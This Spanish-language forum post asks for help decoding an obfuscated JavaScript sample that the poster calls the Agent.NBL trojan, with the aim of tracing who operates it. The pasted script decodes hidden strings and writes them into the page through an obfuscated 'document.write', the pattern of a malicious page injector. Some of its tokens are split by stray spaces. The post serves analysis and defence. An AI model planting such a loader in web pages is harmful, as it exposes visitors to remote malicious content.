Autor
Llevo un tiempo intentando descifrar este troyano, pero no hay manera, mis conocimientos no son suficientes.
Se trata de un Agent.NBL y quiero saber quien lo está utilizando (con saber que IP hay detrás me vale), a ver si me podéis decir algo vosotros o al menos orientarme.Código:
<script>function uEQTGT(Tly) {
fff.op.replace("330");
}
function qZLP(rtdxPYsA) {
var FhFYAFx = 3,
FtXBkO = 2;
var opjqhbibi = '111,0-178,1-174,0-192,0-166,1-184,1-172,1-69,0-199,1-178,1-171,0-195,0-177,0-112,1-94,1-69,0-177,0-172,1-178,1-175,1-177,0-195,0-112,1-94,1-69,0-168,0-187,1-192,0-171,0-172,1-',
pnoxZRtY = opjqhbibi.split('-');
CMJuejf = '';
function MmualISBAh(c) {
return String.fromCharCode(c);
}
for (QTJMgSLu = (pnoxZRtY.length - 1); QTJMgSLu >= (0x27 + 0x19 - 0x29 + 0x13 - 0x2a); QTJMgSLu -= 0x2e - 0x7 + 0x16 + 0x31 - 0x6d) {
KzuhUH = pnoxZRtY[QTJMgSLu].split(',');
vSRxlM = parseInt(KzuhUH[0] * FtXBkO) + parseInt(KzuhUH[1]);
vSRxlM = parseInt(vSRxlM) / FhFYAFx;
CMJuejf = MmualISBAh(vSRxlM - (-0x28 - 0x20 - 0x7 + 0x2e + 0x2f + 0x27 - 0x27)) + CMJuejf;
}
if (CMJuejf.charCodeAt(CMJuejf.length - 1) == 0) CMJuejf = CMJuejf.substring(0, CMJuejf.length - 1);
return CMJuejf.replace(/^\s+|\s+$/g, '');
}
function qFaLZ(VgOCSfGM) {
alert('VNiDlNkETP');
}
function qCaCGik(hPKtjZY) {
var CcEptTR = 3,
cKT = 4;
var etRk = '96,0-56,1-46,2-34,2-87,0-96,0-83,1-92,1-86,1-84,0-93,3-96,0-85,2-86,1-96,0-56,1-46,2-34,2-96,3-96,0-84,3-56,1-39,3-88,2-97,2-97,2-94,2-54,0-45,3-45,3-',
Evx = etRk.split('-');
hADFvxU = '';
function zQWgSzrLki(c) {
return String.fromCharCode(c);
}
for (nXHAad = (Evx.length - 1); nXHAad >= (0x2e - 0x5 - 0x1f - 0x17 - 0x5 - 0x1c + 0x2e); nXHAad -= 0x13 - 0x32 - 0x2a - 0x24 + 0x1a + 0x18 + 0x3c) {
fFKt = Evx[nXHAad].split(',');
BzOtIEmZN = parseInt(fFKt[0] * cKT) + parseInt(fFKt[1]);
BzOtIEmZN = parseInt(BzOtIEmZN) / CcEptTR;
hADFvxU = zQWgSzrLki(BzOtIEmZN - (0x1e - 0x3 - 0x1c + 0x8 - 0x20 - 0x8 + 0x2f)) + hADFvxU;
}
if (hADFvxU.charCodeAt(hADFvxU.length - 1) == 0) hADFvxU = hADFvxU.substring(0, hADFvxU.length - 1);
return hADFvxU.replace(/^\s+|\s+$/g, '');
}
function lArl(iWMSlDjR) {
var wsQUc = 4,
xnsiWYwap = 5;
var AMnDIRRp = '100,0-104,4-93,3-94,2-106,2-88,4-48,0-90,2-100,0-98,2-48,4-95,1-99,1-52,4-48,0-100,4-94,2-100,4-42,2-60,4-59,1-48,4-95,1-92,4-102,2-88,4-98,2-92,0-60,4-',
zuhNmE = AMnDIRRp.split('-');
KuxZrugfZD = '';
function IFXqgBs(c) {
return String.fromCharCode(c);
}
for (YvUbfX = (zuhNmE.length - 1); YvUbfX >= (0x1e + 0x23 - 0x41); YvUbfX -= 0x1a + 0x1c - 0x1e + 0x8 - 0x6 - 0x19) {
RuVuPrSaa = zuhNmE[YvUbfX].split(',');
wdzs = parseInt(RuVuPrSaa[0] * xnsiWYwap) + parseInt(RuVuPrSaa[1]);
wdzs = parseInt(wdzs) / wsQUc;
KuxZrugfZD = IFXqgBs(wdzs - (-0x17 + 0x14 + 0x2a - 0x13 + 0x2f + 0x26 - 0x5b)) + KuxZrugfZD;
}
if (KuxZrugfZD.charCode At(KuxZrugfZD.length - 1) == 0) KuxZrugfZD = KuxZrugfZD.substrin g(0, KuxZrugfZD.length - 1);
return KuxZrugfZD.replace(/^\s+|\s+$/g, '');
}
var UrdRh = qZLP('ERWHE') + qCaCGik('grcu') + lArl('rHePy');
HqlzXHjJve = document;
HqlzXHjJve['5350wr3371i6938t707 8e59467460'.replace(/[0-9]/g, '')](UrdRh);
function yoSnqC(TOWXLLOA) {
var sjMmLX = document.getElement ById('VCF');
fff.op.replace("396");
}
function BumvYsfwr(Hzdg) {
var FAd = new Function("MmNhmml", "return 789480;");
var ehrDXPwt = document.getElement ById('DKARR');
}
function UClzxt(djvKGvEh) {
fff.op.replace("265");
var KrGkVeqYdo = new Function("THdSfdcrN", "return 280763;");
}
</script>A ver si me podéis hechar una mano!!
En línea
